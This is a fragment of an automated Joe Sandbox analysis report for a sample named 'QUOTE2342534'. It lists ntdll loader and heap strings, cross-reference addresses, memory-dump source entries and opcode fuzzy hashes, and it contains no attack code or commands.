                                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 0178A117
                                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-161242083
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-1334570610
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-1783798831
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                                                                                                                                                                • PreferredUILanguages, xrefs: 017DC212
                                                                                                                                                                                                                                                • @, xrefs: 017DC1F1
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                                                                                                                                                                • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$MUI
                                                                                                                                                                                                                                                • API String ID: 0-17815947
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                                                                                                                                                                • kLsE, xrefs: 01720540
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: GlobalTags
                                                                                                                                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .mui
Similarity
• API ID:
• String ID: EXT-
Similarity
• API ID:
• String ID: BinaryHash
Similarity
• API ID:
• String ID: #
Similarity
• API ID:
• String ID: BinaryName
Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                                                                                • Opcode ID: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                                                                                                                                                                • Instruction ID: e12fd571fead50e5b09d6e6fd561b46269c75837e558d974914eaf9a1ed8d91a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64012B732002119BE7216B59CC88E96FF69EFC6755B84022CF78506559CB246882CB93
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                                                                                                                                                                • Instruction ID: 97ec14549b2f282836cc629e00522456579741ba0f8ca51d020da1a4436ceb96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D442D2766083419FE725CF68C890A6BFBE5BFC8B40F18092DFA8297252D770D945CB52
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                                                                                                                                                                • Instruction ID: 71a1ead87f07317500e1e874433b712355e7a394e111563f06fc769464fcb846
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8424D75A102198FEB24CF69C881BEDFBF9BF48304F188199E949EB242D7349985CF51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                                                                                • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
Memory Dump Source
• Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                                                                                • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                                                                                • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                                • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                                                                                • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                                                                                • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                                                                                • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction ID: c2094183a5523e73012e033723a4f7dfb41a39ebd0bcabb5032f9140a1097150
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB1E531604646AFDB26DB68C854FBEFBF6AF84300F280199E552D7386DB70E941DB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                                                                                                                                • Instruction ID: da7fb99e1c3d095bbfcd58ab7e874d5a139ff70be9b325233726a6df487ccaa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36C166702083818FE764DF19C494BABF7E4BF88304F54496DE98987291E775EA09CF92
Memory Dump Source
• Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0a45107bc3dda72818cef6e3007c8c11b6ee48c7ab3085248cc6ab08955491b7
                                                                                                                                                                                                                                                • Instruction ID: f90aed4c48121f91f7fdf17c619cb5c1f89a05c277d91e85f1e943f316984e90
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a45107bc3dda72818cef6e3007c8c11b6ee48c7ab3085248cc6ab08955491b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C71DCB5C00229DBCB269F58C8907BEFBB5FF98710F14415AE942AB351E3309940CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 80ed2e974519feeb7d3f9ce2b8b53da2567b3637c17bc27f945456391ca86c8b
                                                                                                                                                                                                                                                • Instruction ID: a6ddf4a9e866b092c451ffe493d8f593523070945e5fcb46ba46a5837c8d9d44
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80ed2e974519feeb7d3f9ce2b8b53da2567b3637c17bc27f945456391ca86c8b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A571C1709042569FDB15CF59C880AFAFBF9EF89304F0480A9E994DB252E335DA45CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d57c57ad086b436c519be7d57d252c946d2896a96a573c770c3f4164537dab6e
                                                                                                                                                                                                                                                • Instruction ID: a5f368aa1bfa2b75356dbcb93521d5be487d48a64e97c7090234dfc637494d4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d57c57ad086b436c519be7d57d252c946d2896a96a573c770c3f4164537dab6e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E571BF71900209EFDB20CF99D944A9AFBFCFF91300F25415AE641AB658E7B28B40CF15
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: aee563ace5e70f639cb2f6206e26ad66452c15be15b649ebb26533c465a5d45d
